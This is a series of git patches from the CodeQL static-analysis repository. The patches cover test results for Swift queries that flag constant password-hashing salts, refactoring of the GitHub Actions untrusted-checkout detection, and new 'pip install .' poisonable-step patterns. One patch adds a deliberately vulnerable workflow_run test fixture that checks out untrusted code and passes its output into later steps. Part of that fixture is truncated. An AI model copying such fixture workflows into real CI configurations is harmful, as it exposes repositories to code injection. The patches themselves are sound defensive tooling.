| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:70:106:70:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:70:106:70:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:70:131:70:131 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:70:131:70:131 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:71:133:71:133 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:71:133:71:133 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:72:106:72:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:72:106:72:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:74:127:74:127 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:74:127:74:127 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:74:152:74:152 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:74:152:74:152 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:75:154:75:154 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:75:154:75:154 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:76:127:76:127 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:76:127:76:127 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:77:135:77:135 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:77:135:77:135 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:77:160:77:160 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:77:160:77:160 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:78:162:78:162 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:78:162:78:162 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:79:135:79:135 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:79:135:79:135 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | | test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | | test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | From fa43207538d25f51dd5a65cdf6262b88054f98f3 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Mon, 18 Nov 2024 09:40:06 +0000 Subject: [PATCH 0704/1267] Swift: Autoformat. --- .../lib/codeql/swift/security/CommandInjectionExtensions.qll | 3 ++- .../lib/codeql/swift/security/PredicateInjectionExtensions.qll | 3 ++- swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll | 3 ++- .../swift/security/UncontrolledFormatStringExtensions.qll | 3 ++- swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll | 3 ++- swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll | 3 ++- .../codeql/swift/security/regex/RegexInjectionExtensions.qll | 3 ++- 7 files changed, 14 insertions(+), 7 deletions(-) diff --git a/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll index 55391bd3378..426fc7a664f 100644 --- a/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll @@ -63,6 +63,7 @@ private class CommandInjectionSinks extends SinkModelCsv { private class CommandInjectionDefaultBarrier extends CommandInjectionBarrier { CommandInjectionDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = + ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll index 1ff8b97a281..2beb37c88d2 100644 --- a/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll @@ -46,6 +46,7 @@ private class PredicateInjectionSinkCsv extends SinkModelCsv { private class PredicateInjectionDefaultBarrier extends PredicateInjectionBarrier { PredicateInjectionDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = + ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll index 0ecc24a178e..4a871496795 100644 --- a/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll @@ -190,6 +190,7 @@ private class DefaultSqlInjectionSink extends SqlInjectionSink { private class SqlInjectionDefaultBarrier extends SqlInjectionBarrier { SqlInjectionDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = + ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll index eb44f6894b9..97c987c51b0 100644 --- a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll @@ -94,6 +94,7 @@ class HeuristicUncontrolledFormatStringSink extends UncontrolledFormatStringSink private class UncontrolledFormatStringDefaultBarrier extends UncontrolledFormatStringBarrier { UncontrolledFormatStringDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = + ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll b/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll index 923449f4d73..9129d033409 100644 --- a/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll @@ -127,6 +127,7 @@ private class DefaultUnsafeJsEvalSink extends UnsafeJsEvalSink { private class UnsafeJsEvalDefaultBarrier extends UnsafeJsEvalBarrier { UnsafeJsEvalDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = + ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll b/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll index 1df4a06417b..114ba813d21 100644 --- a/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll @@ -73,6 +73,7 @@ private class UnsafeUnpackAdditionalDataFlowStep extends UnsafeUnpackAdditionalF private class UnsafeUnpackDefaultBarrier extends UnsafeUnpackBarrier { UnsafeUnpackDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = + ["Numeric", "SignedInteger", "UnsignedInteger"] } } diff --git a/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll index 09c4641cbf0..eb2f3ed564b 100644 --- a/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll @@ -64,6 +64,7 @@ private class RegexInjectionSinks extends SinkModelCsv { private class RegexInjectionDefaultBarrier extends RegexInjectionBarrier { RegexInjectionDefaultBarrier() { // any numeric type - this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"] + this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = + ["Numeric", "SignedInteger", "UnsignedInteger"] } } From 3ce3cf43bede831cf888cc9d7dec5cc38e8fb2cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 19 Nov 2024 11:31:35 +0100 Subject: [PATCH 0705/1267] refactor common code to identify untrusted checkouts --- .../codeql/actions/dataflow/FlowSources.qll | 47 +------------------ .../security/ArtifactPoisoningQuery.qll | 15 +++--- .../security/OutputClobberingQuery.qll | 21 +-------- .../security/UntrustedCheckoutQuery.qll | 25 ++++++++++ 4 files changed, 37 insertions(+), 71 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 2fca425642e..cf1763b1c03 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -92,28 +92,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { GitCommandSource() { exists(Step checkout, string cmd_regex | - // This should be: - // source instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - ( - exists(Uses uses | - checkout = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() - ) - or - checkout instanceof GitMutableRefCheckout - or - checkout instanceof GitSHACheckout - or - checkout instanceof GhMutableRefCheckout - or - checkout instanceof GhSHACheckout - ) and + checkout instanceof SimplePRHeadCheckoutStep and this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and run.getScript().getAStmt() = cmd and @@ -255,29 +234,7 @@ class ArtifactSource extends RemoteFlowSource, FileSource { private class CheckoutSource extends RemoteFlowSource, FileSource { Event event; - CheckoutSource() { - // This should be: - // source instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses uses | - this.asExpr() = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - event = uses.getATriggerEvent() and - event.getName() = checkoutTriggers() - ) - or - this.asExpr() instanceof GitMutableRefCheckout - or - this.asExpr() instanceof GitSHACheckout - or - this.asExpr() instanceof GhMutableRefCheckout - or - this.asExpr() instanceof GhSHACheckout - } + CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } override string getSourceType() { result = "artifact" } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 31427287b0c..d8d5f83c867 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -3,6 +3,7 @@ private import codeql.actions.TaintTracking import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps +import codeql.actions.security.UntrustedCheckoutQuery string unzipRegexp() { result = "(unzip|tar)\\s+.*" } @@ -22,11 +23,10 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us exists(this.getArgument("github-token")) or // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step - exists(LocalJob job, UsesStep checkout, UsesStep upload | + exists(LocalJob job, SimplePRHeadCheckoutStep checkout, UsesStep upload | this.getEnclosingWorkflow().getAJob() = job and job.getAStep() = checkout and - job.getATriggerEvent().getName() = "pull_request_target" and - checkout.getCallee() = "actions/checkout" and + checkout.getATriggerEvent().getName() = "pull_request_target" and checkout.getAFollowingStep() = upload and upload.getCallee() = "actions/upload-artifact" ) @@ -55,8 +55,10 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep "ma-ve/action-download-artifact-with-retry" ] and ( - not exists(this.getArgument(["branch", "branch_name"])) or - not this.getArgument(["branch", "branch_name"]) = ["main", "master"] + not exists(this.getArgument(["branch", "branch_name"])) + or + exists(this.getArgument(["branch", "branch_name"])) and + this.getArgument("allow_forks") = "true" ) and ( not exists(this.getArgument(["commit", "commitHash", "commit_sha"])) or @@ -74,7 +76,8 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep ) and ( not exists(this.getArgument("pr")) or - not this.getArgument("pr").matches("%github.event.pull_request.number%") + not this.getArgument("pr") + .matches(["%github.event.pull_request.number%", "%github.event.number%"]) ) } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index e6cc0d06a46..1d0de83afa3 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -20,26 +20,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( step instanceof UntrustedArtifactDownloadStep or - // This should be: - // artifact instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses uses | - step = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() - ) - or - step instanceof GitMutableRefCheckout - or - step instanceof GitSHACheckout - or - step instanceof GhMutableRefCheckout - or - step instanceof GhSHACheckout + step instanceof SimplePRHeadCheckoutStep ) and step.getAFollowingStep() = run and this.asExpr() = run.getScript() and diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 9653ae2beda..1a75f8a96c1 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -193,6 +193,31 @@ predicate containsHeadRef(string s) { ) } +class SimplePRHeadCheckoutStep extends Step { + SimplePRHeadCheckoutStep() { + // This should be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses uses | + this = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") and + uses.getATriggerEvent().getName() = checkoutTriggers() + ) + or + this instanceof GitMutableRefCheckout + or + this instanceof GitSHACheckout + or + this instanceof GhMutableRefCheckout + or + this instanceof GhSHACheckout + } +} + /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); From afb7967a0cde8e0018678cc2c5453515828f36d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 19 Nov 2024 11:31:59 +0100 Subject: [PATCH 0706/1267] Delete .actual test files --- .../CodeQL/UnnecessaryUseOfAdvancedConfig.actual | 1 - 1 file changed, 1 deletion(-) delete mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual deleted file mode 100644 index 3c8904a86af..00000000000 --- a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | From 082b4c3ca2c28032e28361dd9eda4351cafed333 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 20 Nov 2024 15:35:49 +0100 Subject: [PATCH 0707/1267] Add poisonable step for pip install . --- ql/lib/ext/config/poisonable_steps.yml | 6 +-- .../CWE-094/.github/workflows/test27.yml | 52 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 12 +++++ .../CWE-094/CodeInjectionMedium.expected | 11 ++++ .../CWE-829/.github/workflows/test7.yml | 1 + .../UntrustedCheckoutCritical.expected | 6 ++- 6 files changed, 83 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2f03b94b402..87ed8eec76f 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -41,9 +41,9 @@ extensions: - ["pre-commit"] - ["prettier"] - ["phpstan"] - - ["pip\\s+install\\s+-r"] - - ["pip\\s+install\\s+--requirement"] - - ["pipx\\s+install\\s+\\."] + - ["pip\\s+install(.*)\\s+-r"] + - ["pip\\s+install(.*)\\s+--requirement"] + - ["pip(x)?\\s+install(.*)\\s+\\."] - ["poetry"] - ["pylint"] - ["pytest"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml new file mode 100644 index 00000000000..e9ba77c0f93 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml @@ -0,0 +1,52 @@ +name: Test WR + +on: + workflow_run: + workflows: + - Test + types: + - completed + +permissions: + contents: write + pull-requests: write + +jobs: + setup: + name: Setup + runs-on: ubuntu-24.04 + outputs: + github-sha: ${{ steps.get-sha.outputs.sha }} + chart-version: ${{ steps.get-version.outputs.chart_version }} + steps: + - name: Get triggering event SHA + id: get-sha + run: | + if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then + echo sha="${{ inputs.checkout_ref }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "workflow_run" ]]; then + echo sha="${{ github.event.workflow_run.head_sha }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "push" ]]; then + echo sha="${{ github.sha }}" >> $GITHUB_OUTPUT + else + echo "Invalid event type" + exit 1 + fi + - name: Checkout Source Code + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + persist-credentials: false + ref: ${{ steps.get-sha.outputs.sha }} + fetch-depth: 0 + - name: Get version + id: get-version + run: | + echo "chart_version=$(> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e6066479576..e13c2b80a72 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -206,6 +206,11 @@ edges | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | provenance | | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | provenance | | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT shell: bash - run: python2.7 foo.py + - run: pip install --no-deps . diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b433ec02f1..111edb7646d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -210,7 +210,8 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | -| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:59:30 | Run Step | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:60:6 | Run Step | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | @@ -351,7 +352,8 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:59:9:59:30 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:59:30 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:60:9:60:37 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run 